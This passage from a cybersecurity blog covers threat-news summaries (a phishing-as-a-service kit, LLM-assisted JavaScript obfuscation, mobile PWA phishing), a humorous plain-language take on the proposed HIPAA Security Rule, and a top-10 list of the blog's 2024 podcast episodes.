  • Cybercriminal Promotion: Advertised on multiple cybercrime forums and boasting a Telegram channel with nearly 500 subscribers, Araneida has been linked to the compromise of over 30,000 websites within six months. One user claimed to have purchased a luxury vehicle using proceeds from payment card data obtained through the service. 

  • Connection to Turkish IT Firm: Investigations reveal that the domain araneida[.]co, operational since February 2023, is associated with an individual employed as a senior software developer at Bilitro Yazilim, an IT firm based in Ankara, Turkey. 

Further Reading: Krebs on Security 


LLMs Employed to Obfuscate Malicious JavaScript 

Recent analyses have revealed that adversaries are leveraging large language models (LLMs) to obfuscate malicious JavaScript code, enhancing its ability to evade detection mechanisms. 

Key Developments: 

  • Automated Code Obfuscation: Attackers utilize LLMs to iteratively transform malicious JavaScript through techniques such as variable renaming, dead code insertion, and whitespace removal, without altering the code's functionality. 

  • Evasion of Detection Tools: These LLM-generated variants can bypass traditional detection tools, including static analysis models, by producing natural-looking code that is harder to identify as malicious. 

  • Scalability of Attacks: The use of LLMs enables the creation of numerous unique malware variants at scale, increasing the difficulty for security systems to detect and mitigate these threats effectively. 

Further Reading: Unit 42 Blog 


Mobile Phishing Attacks Employ New Tactics to Evade Security Measures 

Recent analyses have identified a novel social engineering tactic targeting mobile banking users. Attackers are leveraging Progressive Web Apps (PWAs) and WebAPKs to distribute phishing websites disguised as legitimate applications, effectively bypassing traditional security warnings and app store vetting processes. 

Key Insights: 

  • Exploitation of PWAs and WebAPKs: Unlike traditional apps, these malicious PWAs and WebAPKs are essentially phishing websites packaged to look like legitimate applications. This means they do not exhibit the typical behaviors or characteristics associated with malware, making detection more challenging. 

  • Bypassing Security Measures: Their ability to bypass traditional security warnings of a mobile operating system, and total sidestepping of app store vetting processes, is particularly concerning. This allows attackers to distribute malicious content without triggering standard security alerts. 

  • Anticipated Increase in Sophistication: It is anticipated that more sophisticated and varied phishing campaigns utilizing PWAs and WebAPKs will emerge, unless mobile platforms change their approach towards them. 

Further Reading: KnowBe4 Blog 


In News Tags Newsletter, Cybersecurity, Threat Intelligence

DHHS Angry Translator: Breaking Down the Latest HIPAA Security Rule Proposal

January 7, 2025

Let’s face it: regulatory updates like those from the Department of Health and Human Services (DHHS) often come wrapped in a blanket of formal language that makes you wonder, What are they really saying? Enter the DHHS Angry Translator, here to break it down and tell it like it is. Like the recently introduced CISA Angry Translator, the DHHS Angry Translator, Hank, has a no-nonsense take on the proposed changes to the HIPAA Security Rule—because sometimes, you need a little fire to get the message across.

Created with help from ChatGPT

DHHS Says:
"Covered entities and business associates must adopt reasonable and appropriate administrative, physical, and technical safeguards to protect the confidentiality, integrity, and availability of ePHI."

Hank:
"Look, people! You’re handling sensitive health information here—stop treating it like a casual to-do list. Lock it down! If you wouldn’t leave patient records lying around in a coffee shop, don’t let your servers be a free-for-all!"

DHHS Says:
"We propose clarifying the definition of 'security incident' to ensure timely identification and response to unauthorized access, use, or disclosure of ePHI."

Hank:
"Translation: Stop pretending you didn’t notice the breach. When someone jiggles the doorknob, that’s your cue to ACT, not wait for the whole door to come down!"

DHHS Says:
"Entities must perform regular risk assessments to identify vulnerabilities and implement measures to mitigate those risks effectively."

Hank:
"Let me break it down for you: Take a good, hard look at your systems. If you see a crack, fix it! Don’t wait for a cybercriminal to make it a canyon!"

DHHS Says:
"The proposed changes aim to enhance accountability and transparency in managing ePHI security."

Hank:
"Translation: If you mess up, we’re coming for you. There’s no hiding anymore. Either you get your house in order, or we’ll do it for you—with penalties."

DHHS Says:
"We propose revisions to the administrative safeguards, emphasizing the necessity of documented policies and procedures for incident response and risk management."

Hank:
"Y’all need to WRITE THIS DOWN! A half-baked plan in someone’s head doesn’t cut it. If a breach happens and your response is ‘Uh... what now?’—you’re already toast!"

DHHS Says:
"The proposal includes requirements to integrate continuous monitoring into risk management practices for ePHI security."

Hank:
"‘Continuous monitoring’ means don’t just check your security once a year like it’s a New Year’s resolution. Stay on top of it! Hackers aren’t taking vacations—they’re coming for you every day!"

DHHS Says:
"Entities must evaluate their use of encryption to ensure ePHI remains secure during transmission and storage."

Hank:
"If your data isn’t encrypted, it’s like sending patient records via postcard: everyone can see it! Encrypt. Everything. Period."

DHHS Says:
"We are revising technical safeguard requirements to account for emerging technologies and new cybersecurity threats."

Hank:
"Translation: If you’re still using security from the early 2000s, it’s time for an upgrade. Hackers have moved on, and so should you!"

DHHS Says:
"Workforce training should address phishing attacks, unauthorized device use, and secure access to ePHI."

Hank:
"Teach your people that clicking shady links isn’t just a bad idea—it’s a disaster waiting to happen. Also, tell them to stop using their cousin’s unsecured iPad for work!"

DHHS Says:
"The proposed changes highlight accountability mechanisms for business associates handling ePHI."

Hank:
"Listen up, third parties: If you’re touching ePHI, you’re on the hook too. No more pointing fingers when things go wrong. Handle the data like it’s your grandma’s—or get burned!"

DHHS Says:
"Periodic evaluations of safeguards will ensure compliance with evolving security standards."

Hank:
"‘Periodic evaluations’ means you don’t just set it and forget it. Check your defenses regularly, or you’ll be picking up the pieces after the next attack!"

Final Note from the Angry Translator:
"This proposal isn’t just about checking boxes—it’s about protecting people. If your security plan is older than your favorite streaming service, fix it. Now. Because when things go wrong, it’s not just your reputation on the line—it’s patients’ trust and safety too."

The comment period for the proposed HIPAA Security Rule changes is open until March 7, 2025. If you’re at a healthcare organization, make sure to read it and submit your public comments. I am currently doing a deep dive on the proposal and will have thoughts in a future blog post.

In News, Advice Tags HIPAA, Healthcare, Cybersecurity

Top 10 Exploring Information Security Podcasts

December 31, 2024

As we wrap up an incredible year, we're thrilled to reflect on the top podcasts of 2024 that captured the attention of listeners across the cybersecurity community. These episodes brought forward thought-provoking discussions, practical insights, and exciting guests, making this a standout year for Exploring Information Security. Below are the top 10 episodes that ChatGPT thought were the best of 2024. As I analyzed the analytics I couldn’t decide which stats to focus on. Here’s what the podcasts look like based on plays from Apple Podcast Analytics.

Screenshot of the analytics from Apple Podcasts analytics

I thought about going by average consumption but I noticed that we have a lower percentage than in the past. That’s due to the longer episodes I’m putting out. When I’m putting out 20-30 min episodes I get closer to a 70-80% consumption rate. Do unique listeners and engagement say more? At this point I decided to just let ChatGPT do the analysis of all the analytics and provide me with the Top 10 list. It also wrote the first draft of this blog post. I’m okay with the Top 10 list. I believe it represents the podcast well and some of the interest I’ve seen in other places regarding individual episodes.

The numbers are just from Apple Podcast. There are listeners on other platforms such as Spotify, Amazon, and other podcast platforms that grab the feed. I also expanded into YouTube in the middle of the year and hope to get that tuned better. I may try to consolidate the stats all into one platform at some point but I’m not there yet. Apple Podcast is the most popular platform so I think it provides the best sample size.

Without further ado let’s get into the Top 10 list for 2024.


2024 Top 10 Exploring Information Security Podcast

1. Exploring Information Security 2024 Relaunch

  • Release Date: January 2, 2024

  • Guest: Solo Episode

Key Highlights:
Our relaunch episode kicked off the year by outlining an exciting new direction for Exploring Information Security. I’m shocked that this came out on top but there seemed to be some excitement at the return of the podcast. Which I’m very appreciative of and makes me want to kick myself for not bringing the podcast back sooner.
Listen Here: Exploring Information Security 2024 Relaunch

2. What Cybersecurity Tools Every Organization Should Have

  • Release Date: February 27, 2024

  • Guest: Rob Fuller

Key Highlights:
Rob Fuller shared insights into the essential tools that every organization should have to secure their digital infrastructure. The episode covered endpoint protection, threat intelligence platforms, and emerging technologies that simplify security operations. This was the result of a discussion we had during another podcast recording. I thought it was a great discussion to turn into its own topic.
Listen Here: What Cybersecurity Tools Every Organization Should Have

3. How to Hack a Satellite

  • Release Date: January 23, 2024

  • Guest: Tim Fowler

Key Highlights:
Tim Fowler took listeners on a deep dive into the vulnerabilities and challenges of securing space technology. From real-world case studies of satellite hacks to strategies for defense, this episode offered a unique and fascinating perspective on the intersection of cybersecurity and aerospace. This will continue to grow as a new field for cybersecurity, very similar to how cloud security, identity access management, and AI have become their own fields. And as usual we’re already behind on security…
Listen Here: How to Hack a Satellite

4. What Are the Hiring Trends in Cybersecurity for 2024?

  • Release Date: January 16, 2024

  • Guest: Erin Barry

Key Highlights:
In this insightful episode, Erin Barry analyzed the latest hiring trends in cybersecurity heading into 2024. The conversation touched on the growing demand for professionals with cloud and AI expertise, the importance of soft skills, and tips for breaking into the field. A must-listen for job seekers and industry leaders. This is a podcast I’d like to make a staple for the new year because it did seem to be a popular topic.
Listen Here: What Are the Hiring Trends in Cybersecurity for 2024?

5. How to Navigate a Career in Cybersecurity

  • Release Date: August 13, 2024

  • Guest: Ralph Collum

Key Highlights:
Ralph Collum shared his journey from entry-level roles to executive leadership in cybersecurity. The discussion covered mentorship, certifications, and strategies for navigating career plateaus. I always enjoy talking to Ralph. He’s very passionate about developing careers in Cybersecurity. It makes sense that this one would follow the hiring trends for 2024. I expect that with the current hiring market job seeking and career podcast episodes will remain popular.
Listen Here: How to Navigate a Career in Cybersecurity

6. How AI Is Impacting Cybersecurity

  • Release Date: July 30, 2024

  • Guest: Steve Orrin

Key Highlights:
Steve Orrin explored the dual role of artificial intelligence in cybersecurity, highlighting its use in threat detection and the ethical concerns it raises. The episode featured real-world examples of AI-driven security solutions and debated the future of automation in the industry. I really enjoyed this conversation with Steve because he’s not only an executive but someone who also attends DEFCON on a regular basis. He traverses both worlds well and has a very intelligent take on key topics in Cybersecurity.
Listen Here: How AI Is Impacting Cybersecurity

7. How Responding to Phishing Has Changed in the Last 5 Years

  • Release Date: January 30, 2024

  • Guest: Kyle Andrus

Key Highlights:
Kyle Andrus and I discussed how phishing has changed since I last had him on the podcast. I always enjoy having Kyle on because we always have a good conversation. In fact he and I have had a couple of recording sessions at this point on other topics because we always end up talking about something else. I’ve got another recording session scheduled with him for early 2025 to talk about ransomware gangs.
Listen Here: How Responding to Phishing Has Changed in the Last 5 Years

8. How to Automate Information Security with Python

  • Release Date: July 23, 2024

  • Guest: Mark Baggett

Key Highlights:
Mark Baggett broke down the ways Python is revolutionizing cybersecurity automation. From simplifying vulnerability scanning to streamlining log analysis, this episode was packed with actionable insights for security professionals looking to enhance their workflows. Mark is the Python guru for Cybersecurity. He’s written an entire SANS class on it and he’s been talking about Python ever since I’ve been in the industry.
Listen Here: How to Automate Information Security with Python

9. What Is Mimikatz?

  • Release Date: February 6, 2024

  • Guest: Rob Fuller

Key Highlights:
Rob Fuller delivered an in-depth look at Mimikatz, a powerful tool often used in penetration testing and malicious attacks. He explained its functionality, provided examples of its use, and discussed the countermeasures security teams can implement to defend against it. I’ve dubbed Rob the Hacker Historian because of his wealth of knowledge in hacking. He made the Top 10 list three times this year and was also in the RERELEASE of the episode on the MS08-067 vulnerability.
Listen Here: What Is Mimikatz?

10. How Worrying Is SIM Swapping in 2024?

  • Release Date: August 6, 2024

  • Guest: Rob Fuller

Key Highlights:
Rob Fuller returned to discuss the NOT SO alarming rise of SIM swapping attacks in 2024. This was based on a LinkedIn post he made on SIM Swapping that got quite a bit of commentary. I thought it was a great discussion and would make for an interesting episode. Surprise! It was a great conversation and people seemed to engage with the podcast episode. These are the kind of episodes I want to have that challenge some of the norms within Cybersecurity.
Listen Here: How Worrying Is SIM Swapping in 2024?

Honorable Mentions

Two of the people I always wanted to have on the podcast but was too scared to ask prior to shutting down the podcast were Troy Hunt and Patrick Gray. Both have helped me navigate and shape my career in cybersecurity and I was happy that both agreed to come on. Both were absolutely amazing people to have a conversation with.

What is Have I Been Pwned?

The Origins of Risky Business with Patrick Gray

Finally, Dave Chronister has been a huge supporter of the show and a wonderful friend. He also runs a phenomenal conference called ShowMeCon (early-bird tickets available now!)! He’s always a joy to have on the show but this past year he sponsored several episodes and I had a lot of great conversations with presenters from the conference. I have probably never laughed more than I did talking to Kevin Johnson about whatever was on his mind. Also, I really enjoyed the panel we did at ShowMeCon. Unfortunately, I forgot to hit the record button and thus entered the mythical status as a podcast that only those present got to enjoy.

ShowMeCon: Kevin Johnson and whatever he wants to talk about

Final Thoughts

As always, I’m grateful to the listeners of the show. I don’t hear from a lot of them but based on the numbers and engagement they’re out there. I’m also super grateful to all the guests that have come on the show to share their insights and knowledge. I am looking forward to another great year of conversations with amazing guests!

What were your favorite episodes in 2024?

In Media, Website Tags Podcast, Top 10, Cybersecurity